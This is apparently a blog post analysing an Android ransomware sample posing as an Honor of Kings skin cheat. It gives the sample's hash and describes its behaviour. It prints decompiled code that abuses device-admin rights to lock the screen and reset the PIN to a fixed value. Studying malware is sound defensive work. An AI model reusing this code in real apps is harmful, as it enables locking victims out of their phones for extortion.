Android病毒样本分析(3)

本文介绍了一款名为com.android.getbest-1的病毒软件,该软件伪装成王者荣耀的辅助工具进行传播。病毒会隐藏自身图标并诱导用户激活设备管理器以防止被卸载,然后强制锁定屏幕,即使重启也无法解除。

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

1.基本信息

病毒名称: com.android.getbest-1

文件名称: 王者荣耀刷皮肤

文件MD5: 4FF98D2A5F045921757B73FAA1D6012D

文件包名: com.android.getbest

危害属性: 恶意锁屏、勒索

 

2.基本行为

该程序是一款假借王者荣耀外挂名号的病毒软件,程序启动后隐藏自身图标,诱骗用户激活设备管理器保护自身以免被卸载,之后实现锁屏操作,并且关机无效



 

3.详细分析

1、程序入口函数内启动了一个活动

try
    {
      Class localClass = Class.forName("com.android.getbest.MyAdmin");
      this.componentName = new ComponentName(this, localClass);
      this.isAdminActive = this.dpm.isAdminActive(this.componentName);
      return;
    }
2、活动内,利用设备管理器设置解锁PIN码,通过诱导用户激活设备管理器,勒索软件会在用户未知情的情况下强制给手机设置一个解锁PIN码,导致用户无法解锁手机。

setContentView(2130903040);
    ((Button)findViewById(2131165185)).setText((CharSequence)jiemi.decrypt("A83B614B5AD4F25664AE7C3E62837B8B", "huawei"));
    this.dpm = ((DevicePolicyManager)getSystemService("device_policy"));      //获取权限
    checkAdmin();                                                             //修改解锁PIN码
    paramBundle = new Intent();  
@Override
  public void onEnabled(Context paramContext, Intent paramIntent)
  {
    String str = paramContext.getSharedPreferences("test", 0).getString("test", String.valueOf(6699));   //解锁码
    getManager(paramContext).lockNow();
    getManager(paramContext).resetPassword(str, 0);
    super.onEnabled(paramContext, paramIntent);
  }




开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值